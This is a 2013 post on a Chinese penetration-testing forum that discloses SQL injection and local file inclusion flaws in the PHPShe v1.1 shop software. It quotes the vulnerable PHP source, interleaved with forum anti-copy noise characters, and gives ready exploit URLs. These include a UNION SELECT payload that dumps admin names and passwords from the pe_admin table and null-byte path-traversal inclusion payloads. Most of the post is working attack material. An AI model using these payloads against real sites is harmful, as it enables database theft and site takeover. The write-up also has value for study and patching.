找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 phpshe v1.1多处SQL注入和文件包含漏洞Getshell
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 2327|回复: 0
打印 上一主题 下一主题

phpshe v1.1多处SQL注入和文件包含漏洞Getshell

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2013-4-19 19:01:54 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
/*******************************************************/, m2 v  T% s, D4 V4 N" p
/* Phpshe v1.1 Vulnerability
& n9 Y- e3 y$ v2 R- U$ M/* ========================
+ U: M9 `& R7 ?9 O/* By: : Kn1f3
, _" P# T. u- y/ O/* E-Mail : 681796@qq.com, X% v% R; `6 y0 p1 L  @) y
/*******************************************************/
& S8 R+ J2 Y- u6 c; l! ]0×00 整体大概参数传输
. v/ V4 N7 h# K ' o- J9 A5 A2 }) x7 h
/ O) K1 o& n8 r- f6 G

5 ?% N' f5 |) G//common.php
8 J# n0 x# z7 \if (get_magic_quotes_gpc()) {. z5 N& a8 P$ L" m
!empty($_GET) && extract(pe_trim(pe_stripslashes($_GET)), EXTR_PREFIX_ALL, '_g');
( d$ I* |* ^+ G7 L6 }; [!empty($_POST) && extract(pe_trim(pe_stripslashes($_POST)), EXTR_PREFIX_ALL, '_p');( ]; h4 m% m9 A+ n7 P, l+ @
}
7 K) n+ p3 s7 O  q0 d/ Z2 O, Kelse {
* P" Y  X0 o6 E8 d8 w% Y- _!empty($_GET) && extract(pe_trim($_GET),EXTR_PREFIX_ALL,'_g');
) B3 L/ T; W% k: ]0 s, ?1 c!empty($_POST) && extract(pe_trim($_POST),EXTR_PREFIX_ALL,'_p');# C# |$ X. d+ y& r1 R' k' g
}' l9 ?- o6 R5 K8 a; U+ S
session_start();7 E8 Q' M8 n& h  e0 Z
!empty($_SESSION) && extract(pe_trim($_SESSION),EXTR_PREFIX_ALL,'_s');
0 o# d1 B. D/ F* G1 q# M; ~!empty($_COOKIE) && extract(pe_trim(pe_stripslashes($_COOKIE)),EXTR_PREFIX_ALL,'_c');1 b# y! ~* Y0 k; I- O: I
; }! I* b: P8 C! a3 \2 J/ W* s+ e( |
0×01 包含漏洞- o, V0 ]3 a4 d, k! }5 u! m- G
- {/ r( Z! Y% N) @' N

) ]$ y; `. W6 I" k; F3 ~' X9 Z//首页文件$ c9 [) E0 B- g. d& [9 `) i
<!--?php include('common.php'); $cache_category = cache::get('category'); $cache_category_arr = cache::get('category_arr'); $cache_class = cache::get('class'); $cache_ad = cache::get('ad'); $cache_link = cache::get('link'); $cache_page = cache::get('page'); $web_qq = $cache_setting['web_qq']['setting_value'] ? explode(',', $cache_setting['web_qq']['setting_value']) : array(); $cart_num = pe_login('user') ? $db--->pe_num('cart', array('user_id'=>$_s_user_id)) : (unserialize($_c_cart_list) ? count(unserialize($_c_cart_list)) : 0);
2 M, K  l$ r& i7 einclude("{$pe['path_root']}module/{$module}/{$mod}.php");  //$mod可控造成“鸡肋”包含漏洞
2 Z0 c% t- E. t% h5 H& I7 u, H0 Xpe_result();; J- y& \! O* i3 g
?>
: k: o( s3 D3 d4 C8 m6 ]# W9 ^//common 文件 第15行开始- k  K8 }7 H' s' R3 }5 v8 B& g
url路由配置" M+ ]' L1 [. k: Z
$module = $mod = $act = 'index';7 U; u' o6 X) c7 b9 V7 s
$mod = $_POST['mod'] ? $_POST['mod'] : ($_GET['mod'] ? $_GET['mod'] : $mod);
% ?: u2 X. x) x, @$ J7 N+ i& q' h$act = $_POST['act'] ? $_POST['act'] : ($_GET['act'] ? $_GET['act'] : $act);8 ]5 H; O) ^$ [
$id = $_POST['id'] ? $_POST['id'] : ($_GET['id'] ? $_GET['id'] : $id);$ x4 G4 L- A' [: {3 X. i: Q
//exp:http://127.0.0.1/phpshe_v1.1/index.php?mod=../../robots.txt%000 M6 t! c1 i' ?8 F* U# ?

9 U% ^' A. d+ g
9 _+ ?3 [% o0 `9 l0 [
0×02 搜索注入
4 f3 s3 h6 `8 f; I  c
1 i$ O3 T+ ~- O+ C; I7 u1 h<code id="code2">

//product.php文件" x* T# B6 S7 ], o2 b' M
case 'list':
4 J, [& [  J$ N3 l0 ~5 s% ~$category_id = intval($id);
* }" }$ T2 L* L0 r( B$info = $db->pe_select('category', array('category_id'=>$category_id));
7 d' T5 Q3 s6 n+ ]3 k//搜索. ~" D  F6 T: ^  _) x4 Q
$sqlwhere = " and `product_state` = 1";
+ h, _7 T6 ^% @1 p* v) u7 E( Bpe_lead('hook/category.hook.php');
! f# [1 t$ m6 c9 e7 b1 d1 Pif ($category_id) {, n' L- K$ a0 E& l' i5 C" H
where .= is_array($category_cidarr = category_cidarr($category_id)) ? " and `category_id` in('".implode("','", $category_cidarr)."')" : " and `category_id` = '{$category_id}'";
( ~2 `: x. u2 i' M/ T' J0 L}
0 r0 c3 K5 k8 X$ a. Q. @4 B! P7 A% F$_g_keyword && $sqlwhere .= " and `product_name` like '%{$_g_keyword}%'"; //keyword变量未进行有效的sql语句过滤
8 U' j4 i; E' j) Mif ($_g_orderby) {! c6 A3 b% b% B. U& u, ^
$orderby = explode('_', $_g_orderby);4 _1 g4 i4 x4 `
$sqlwhere .= " order by `product_{$orderby[0]}` {$orderby[1]}";3 p4 a1 H5 ?: d$ H
}$ [  u! z& K" J4 _; z5 O: P
else {8 B/ R2 x7 R. j* O* G
$sqlwhere .= " order by `product_id` desc";
8 b) }8 i  f' V}
4 t' K# ]# V- |* V8 Y$info_list = $db->pe_selectall('product', $sqlwhere, '*', array(16, $_g_page));  R% A8 b& ~# k/ [5 X
//热卖排行$ F5 G+ Z% n; @6 g; u+ f" Y$ \( ]/ O# ~, w
$product_hotlist = product_hotlist();
$ p8 F- k5 D8 T//当前路径
1 x" [- Y' v- @, k$nowpath = category_path($category_id);
/ E( n7 o0 B; ?0 I! n; A$seo = pe_seo($info['category_name']);
: t3 A7 K" y+ A# Oinclude(pe_tpl('product_list.html'));
5 _9 b0 v- P6 H) L. `! ~# n" }. i- Q//跟进selectall函数库. T% Q* s0 A/ n- I4 Q$ Q
public function pe_selectall($table, $where = '', $field = '*', $limit_page = array())8 M7 i. i  U3 ~6 c
{
# i/ u4 C/ P; u7 L1 ]//处理条件语句
( E2 F" g! q# D% n" H+ \; `$sqlwhere = $this->_dowhere($where);& L# P5 p% @. T3 a
return $this->sql_selectall("select {$field} from `".dbpre."{$table}` {$sqlwhere}", $limit_page);
9 ?9 f* h& ]5 O' w}0 l* h/ t- v+ i+ O* P
//exp  {. |/ v  A& w& z
product/list?keyword=kn1f3'+union+select+1,2,3,4,5,(select+concat(admin_name,0x27,admin_pw,0x27)+from+pe_admin),7,8,9,10,11,12,13,14,15,16,17,18,19 and+'1'='1, q( a6 R3 ^& E

</code>& Q1 t) v* R7 r. E( N- L& b) N1 h
8 y+ S8 B( R) I) A
0×03 包含漏洞2
- ]  h5 F! B; u8 r0 o8 z6 I$ h
' K5 e( p$ U( K& w0 O( H$ b1 r<code id="code3">

//order.php

case 'pay':


$ D: ]0 A) {  r% _* ]9 b$order_id = pe_dbhold($_g_id);


) M% m! z+ |  \: v( X, ^1 V$cache_payway = cache::get('payway');


3 _+ {4 |; G* X+ F8 l. F) F* Kforeach($cache_payway as $k => $v) {


# ~. o9 _8 L; Y( ~* t- f2 M$cache_payway[$k]['payway_config'] = unserialize($cache_payway[$k]['payway_config']);

/ p% d) F) T; [) W) |
if ($k == 'bank') {


9 N2 x( f# O- s) _$ v$cache_payway[$k]['payway_config']['bank_text'] = str_replace(array("\r", "\n", "\t"), '\n', $cache_payway[$k]['payway_config']['bank_text']);

) f& D. t8 K! f& P0 I5 f2 ^
}

, K' _& J/ F- ^' h. x2 j, O
}


8 b7 o9 n: E! a0 d3 J, T# a! }$order = $db->pe_select('order', array('order_id'=>$order_id, 'order_state'=>'notpay'));

( f* D1 I) @: }5 \6 H+ u) M, e
!$order['order_id'] && pe_error('订单号错误...');


, q& H9 q8 N* I" @if (isset($_p_pesubmit)) {


. c4 a' i& d# H! M& V' vif ($db->pe_update('order', array('order_id'=>$order_id), $_p_info)) {


' k8 w. Q6 d) `/ l+ U$info_list = $db->pe_selectall('orderdata', array('order_id'=>$order_id));


0 r/ R( t3 m* sforeach ($info_list as $v) {

0 N* c8 t4 w1 u2 f( Z7 B
$order['order_name'] .= "{$v['product_name']};";
; A: |" R. }; Z, I8 B' L


! S& t& u/ x: r}


2 B' g4 i; U0 `( j' d0 Q8 Yecho '正在为您连接支付网站,请稍后...';

* u: ^0 W& l, [+ s) V$ c( \
include("{$pe['path_root']}include/plugin/payway/{$_p_info['order_payway']}/order_pay.php");


' F# d- x7 ?4 p9 j; W  i7 n0 x. ^}//当一切准备好的时候就可以进行"鸡肋包含了"

8 w! X) B" _& Q/ Z$ @% T# b
else {


1 g) Y- @0 t8 N7 dpe_error('支付错误...');


8 y' C: `# j  a, i1 ]}

* z8 u1 C! [% n* r" ^- ]
}

4 _$ u) g. p# H8 I& {* \
$seo = pe_seo('选择支付方式');

7 T; }$ I' i5 }* f$ q' [" j
include(pe_tpl('order_pay.html'));


- V$ w1 V, C( g) [* }! T  j4 V0 m! @break;

}

//exp:

//http://127.0.0.1/phpshe_v1.1/index.php?mod=order&act=pay&id=1304070001

//info%5Border_payway%5D=alipay/../../../1.txt%00&pesubmit=%E7%AB%8B%E5%8D%B3%E6%94%AF%E4%BB%98</code>( j/ p+ y2 t1 |3 V

回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表